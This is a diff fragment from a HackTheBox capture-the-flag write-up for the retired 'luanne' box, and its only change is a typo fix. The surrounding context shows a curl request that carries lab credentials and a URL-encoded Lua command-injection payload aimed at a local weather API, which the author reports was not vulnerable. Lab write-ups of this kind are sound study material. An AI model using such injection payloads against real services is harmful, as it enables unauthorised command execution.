x00tex/hackTheBox/Boxes/linux/Retired/luanne/README.md

 	  </html>

 * same page that get from the port 80 login.
-* tested the code execuation vulnerbility here on port 3001 and it looks line local server is not vulnerable for command execuation -
+* tested the code execution vulnerability here on port 3001 and it looks line local server is not vulnerable for command execution -

 	  $ curl --user webapi_user:iamthebest "http://127.0.0.1:3001/weather/forecast?city=%27%29%3Bos.execute%28%22id%22%29--"
 	  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current